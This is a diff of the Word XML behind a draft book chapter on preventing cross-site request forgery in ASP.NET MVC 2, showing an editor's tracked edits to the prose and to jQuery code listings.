-        <w:t>A savvy attacker would have used javascript to submit our request, stifling the response from our browser so we'd never knew it occured - until it was too late.</w:t>
-      </w:r>
+        <w:t xml:space="preserve">A savvy attacker would have used </w:t>
+      </w:r>
+      <w:del w:id="39" w:author="JSkinner" w:date="2010-03-02T19:07:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">javascript </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="40" w:author="JSkinner" w:date="2010-03-02T19:07:00Z">
+        <w:r>
+          <w:t xml:space="preserve">JavaScript </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">to submit our request, stifling the response from our browser so we'd never knew it </w:t>
+      </w:r>
+      <w:del w:id="41" w:author="JSkinner" w:date="2010-03-02T19:08:00Z">
+        <w:r>
+          <w:delText>occured</w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="42" w:author="JSkinner" w:date="2010-03-02T19:08:00Z">
+        <w:r>
+          <w:t>occurred</w:t>
+        </w:r>
+      </w:ins>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:commentRangeStart w:id="18"/>
-      <w:commentRangeStart w:id="19"/>
+      <w:del w:id="43" w:author="JSkinner" w:date="2010-03-02T19:08:00Z">
+        <w:r>
+          <w:delText xml:space="preserve">- </w:delText>
+        </w:r>
+      </w:del>
+      <w:ins w:id="44" w:author="JSkinner" w:date="2010-03-02T19:08:00Z">
+        <w:r>
+          <w:t xml:space="preserve">— </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>until it was too late.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:t>ASP.NET MVC 2 provides a simple mechanism for combating this vulnerability.</w:t>
       </w:r>
-      <w:commentRangeEnd w:id="18"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:vanish/>
-        </w:rPr>
-        <w:commentReference w:id="18"/>
-      </w:r>
-      <w:commentRangeEnd w:id="19"/>
-      <w:r>
-        <w:commentReference w:id="19"/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2545,9 +2723,21 @@
       <w:r>
         <w:t xml:space="preserve">11.3.2 </w:t>
       </w:r>
+      <w:commentRangeStart w:id="45"/>
       <w:r>
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
+      <w:commentRangeEnd w:id="45"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:i w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="16"/>
+        </w:rPr>
+        <w:commentReference w:id="45"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2563,7 +2753,15 @@
         <w:t>ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
       <w:r>
-        <w:t>, when applied to an action, requires that the input be accompanied by a special token that ensures its from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
+        <w:t>, when applied to an action, requires that the input be accompanied by a special token that ensures it</w:t>
+      </w:r>
+      <w:ins w:id="46" w:author="JSkinner" w:date="2010-03-02T19:08:00Z">
+        <w:r>
+          <w:t>'</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>s from the responding application only.  It must be used in tandem with a special HTML helper that outputs the token in the form in the HTML source.  Listing 11.10 shows the attribute on our vulnerable action.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2571,6 +2769,7 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>Listing 11.10 ValidateAntiForgeryTokenAttribute</w:t>
       </w:r>
     </w:p>
@@ -2579,7 +2778,6 @@
         <w:pStyle w:val="Code"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>[ValidateAntiForgeryToken]</w:t>
       </w:r>
       <w:r>
@@ -2648,32 +2846,9 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:commentRangeStart w:id="20"/>
-      <w:commentRangeStart w:id="21"/>
       <w:r>
         <w:t>Html.AntiForgeryToken()</w:t>
       </w:r>
-      <w:commentRangeEnd w:id="20"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:vanish/>
-          <w:color w:val="000000"/>
-        </w:rPr>
-        <w:commentReference w:id="20"/>
-      </w:r>
-      <w:commentRangeEnd w:id="21"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="16"/>
-        </w:rPr>
-        <w:commentReference w:id="21"/>
-      </w:r>
       <w:r>
         <w:t xml:space="preserve"> helper outputs a hidden </w:t>
       </w:r>
@@ -2758,7 +2933,9 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
-        </w:rPr>
+          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4800600" cy="3845642"/>
@@ -2811,7 +2988,6 @@
         <w:pStyle w:val="FigureCaption"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Figure 11.8 An exception is thrown if the request is not accompanied by a special token</w:t>
       </w:r>
     </w:p>
@@ -2904,6 +3080,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>I</w:t>
       </w:r>
       <w:r>
@@ -2941,7 +3118,24 @@
         <w:t>JsonResult</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by JsonResult with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
+        <w:t xml:space="preserve"> action result that ships with the framework.  If we were to request data returned by </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CodeinText"/>
+          <w:rPrChange w:id="47" w:author="JSkinner" w:date="2010-03-02T19:12:00Z">
+            <w:rPr>
+              <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+              <w:color w:val="auto"/>
+              <w:sz w:val="18"/>
+              <w:szCs w:val="20"/>
+            </w:rPr>
+          </w:rPrChange>
+        </w:rPr>
+        <w:t>JsonResult</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with a GET request, we would not receive the JSON data. Listing 11.12 shows how we must issue a POST from JavaScript code requesting JSON data.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2964,55 +3158,164 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
+      <w:commentRangeStart w:id="48"/>
+      <w:del w:id="49" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="50" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>$.postJSON = function(url, data, callback) {</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">               #|1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
+        <w:t xml:space="preserve">               </w:t>
+      </w:r>
+      <w:ins w:id="51" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="52" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="53" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="54" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="55" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="56" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>$.post(url, data, callback, "json");</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">               #|1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
+        <w:t xml:space="preserve">               </w:t>
+      </w:r>
+      <w:ins w:id="57" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="58" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="59" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="60" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="61" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>};</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">                                                        #|1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
+        <w:t xml:space="preserve">                                                        </w:t>
+      </w:r>
+      <w:ins w:id="62" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve"> </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="63" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="64" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="65" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="66" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="67" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="68" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>$(function() {</w:t>
       </w:r>
     </w:p>
@@ -3020,28 +3323,265 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
+      <w:del w:id="69" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="70" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t xml:space="preserve">$.postJSON('/post/getsecurejsonpost', </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">                     #|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
+        <w:t xml:space="preserve">                     </w:t>
+      </w:r>
+      <w:ins w:id="71" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="72" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="73" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="74" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="75" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="76" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
         <w:t>function(data) {</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">                                    </w:t>
       </w:r>
+      <w:ins w:id="77" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">   </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="78" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="79" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="80" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="81" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="82" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="83" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="84" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="85" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>var options = '';</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                           </w:t>
+      </w:r>
+      <w:ins w:id="86" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">       </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="87" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="88" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="89" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="90" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="91" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="92" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="93" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="94" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>for (var i = 0; i &lt; data.length; i++) {</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:ins w:id="95" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">        </w:t>
+        </w:r>
+      </w:ins>
+      <w:ins w:id="96" w:author="JSkinner" w:date="2010-03-03T17:59:00Z">
+        <w:r>
+          <w:t>|</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="97" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="98" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="99" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="100" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="101" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="102" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="103" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="104" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="105" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>options += '&lt;option value="' +</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
       <w:r>
         <w:t>#|2</w:t>
       </w:r>
@@ -3050,175 +3590,283 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>var options = '';</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                           </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>for (var i = 0; i &lt; data.length; i++) {</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>options += '&lt;option value="' +</w:t>
+      <w:del w:id="106" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="107" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="108" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="109" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="110" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="111" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="112" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="113" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t xml:space="preserve">data[i].Id + '"&gt;' + data[i].Title + </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:ins w:id="114" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">          |</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="115" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="116" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="117" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="118" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="119" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="120" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="121" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="122" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="123" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>'&lt;/option&gt;';</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                        </w:t>
+      </w:r>
+      <w:ins w:id="124" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">           |</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="125" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:del w:id="126" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="127" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="128" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="129" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:del w:id="130" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:tab/>
+        </w:r>
+      </w:del>
+      <w:ins w:id="131" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">    </w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">                                         </w:t>
+      </w:r>
+      <w:ins w:id="132" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:t xml:space="preserve">         |</w:t>
+        </w:r>
+      </w:ins>
+      <w:r>
+        <w:t>#</w:t>
+      </w:r>
+      <w:del w:id="133" w:author="JSkinner" w:date="2010-03-03T17:58:00Z">
+        <w:r>
+          <w:delText>|</w:delText>
+        </w:r>
+      </w:del>
+      <w:r>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t xml:space="preserve">data[i].Id + '"&gt;' + data[i].Title + </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>'&lt;/option&gt;';</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                        </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>}</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                         </w:t>
-      </w:r>
-      <w:r>
-        <w:t>#|2</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
